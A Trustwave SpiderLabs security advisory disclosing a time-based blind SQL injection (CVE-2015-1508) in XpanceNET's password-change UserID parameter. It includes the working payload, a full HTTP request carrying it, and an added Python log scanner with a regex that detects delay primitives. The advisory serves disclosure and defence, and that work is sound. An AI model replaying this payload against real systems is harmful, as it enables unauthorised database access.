Trustwave SpiderLabs Security Advisory TWSL2015-005:
Blind SQL injection in XpanceNET

Published: 04/24/15
Version: 1.0

Vendor: Brainworks Software (http://www.brainworks.com/)
Products: XpanceNET
Version affected: 7.3.27 and prior

Product description:
Xpance is an automated workflow system designed to manage, track, report, and archive print and digital assets for newspapers, magazines, and a wide range of other publications. Xpance controls all file management, so users spend their time producing ads, not searching for them. Xpance retrieves information from the business system, allowing it to track and confirm billing information as assets move through the production cycle, all the while monitoring critical quality issues and virtually eliminating the possibility of errors. Xpance automates all production workflow processes, including pre-flighting digital assets before printing. Xpance performs over 200 functions specifically designed to increase productivity and decrease costs in the production department.

Finding 1: SQL injection Vulnerability
Credit: Piotr Karolak of Trustwave SpiderLabs
CVE: CVE-2015-1508
CWE: CWE-89

The UserID parameter is vulnerable to a blind (time-based) SQL injection attack. When the payload 'waitfor delay'0:0:20'-- is submitted in the UserID parameter, the application takes 20817 milliseconds to respond to the request, compared with 837 milliseconds for the original request, indicating that the injected SQL command caused a time delay. This issue can be exploited in an automated manner using tools such as sqlmap.
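The finding above rests on two observable signals: a time-delay primitive in a request parameter, and a response that takes roughly 20 seconds instead of under one. The following Python script is an added defender-side example (it is not part of the advisory and not XpanceNET code) that runs detection logic over constructed access-log lines, decodes the URL-encoded POST body, flags parameters containing time-delay SQL primitives, and separately flags responses slower than an assumed 5000 ms threshold. The log format, the sample lines and the threshold are assumptions for the example; the 837 ms and 20817 ms timings are taken from the finding.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log lines (assumed format, not from the advisory):
# METHOD PATH STATUS RESPONSE_TIME_MS BODY  ("-" when there is no body)
SAMPLE_LOG = """\
POST /index.php/request_passwordChange 200 837 site=23&UserID=user%40example.com
POST /index.php/request_passwordChange 200 20817 site=23&UserID=user%40example.com'%20waitfor%20delay'0%3a0%3a20'--
POST /index.php/request_passwordChange 200 912 site=23&UserID=o'brien%40example.com
GET /index.php/forgot_password 200 120 -
"""

LOG_RE = re.compile(
    r"^(?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) (?P<ms>\d+) (?P<body>.*)$"
)

# Delay primitives used by time-based blind SQL injection on common engines
# (MSSQL WAITFOR DELAY, MySQL SLEEP/BENCHMARK, PostgreSQL pg_sleep).
TIME_BASED_RE = re.compile(
    r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(|\bpg_sleep\s*\(",
    re.IGNORECASE,
)

SLOW_MS = 5000  # assumed threshold; tune to the application's normal latency


def inspect_request(line, slow_ms=SLOW_MS):
    """Return a dict describing one log line, or None if it does not parse.

    'reasons' lists why the request is suspicious; it is empty for benign lines.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    body = m.group("body")
    if body != "-":
        # parse_qs percent-decodes each value, so encoded spaces and colons
        # in the payload become visible to the pattern match.
        params = parse_qs(body, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if TIME_BASED_RE.search(value):
                    reasons.append(f"time-based SQLi pattern in parameter {name!r}")
    ms = int(m.group("ms"))
    if ms >= slow_ms:
        reasons.append(f"response time {ms} ms exceeds {slow_ms} ms")
    return {"path": m.group("path"), "ms": ms, "reasons": reasons}


def scan_log(text, slow_ms=SLOW_MS):
    """Return only the parsed lines that have at least one reason to alert."""
    findings = []
    for line in text.splitlines():
        result = inspect_request(line, slow_ms)
        if result and result["reasons"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["path"], finding["ms"], "ms:", "; ".join(finding["reasons"]))
```

A legitimate apostrophe in a value (the o'brien address in the sample) produces no alert, which is the point of matching on the delay primitive rather than on quote characters. A single slow response is weak evidence on its own, so the two reasons are reported separately and a rule that requires both is a reasonable first alert.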
REQUEST:
========

POST /index.php/request_passwordChange HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://a.b.c.d/index.php/forgot_password
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Cookie: _xnet=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d35d236692091bd6e232f1fcd210d2dd%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22192.168.75.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+6.0%3B+Windows+NT+5.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221425891428%22%3B%7D2a739896d2fba1a821592e6823a1650e; _ga=GA1.2.356164103.1425891205; _gat=1; __qca=P0-895842040-1425891220263; __unam=84335f5-14bfdbe3353-2b5ab1bd-1

site=23&UserID=user@example.com'%20waitfor%20delay'0%3a0%3a20'--

Remediation Steps:
Upgrade to version 7.3.28 or the latest stable version of XpanceNet. Please note that Trustwave SpiderLabs has not verified this fix.

Revision History:
03/09/15 - Vulnerability disclosed
04/03/15 - Patch released by vendor
04/24/15 - Advisory published

References
1. http://www.brainworks.com/products/xpance.phtml
2. https://www.owasp.org/index.php/Blind_SQL_Injection

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence.
Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.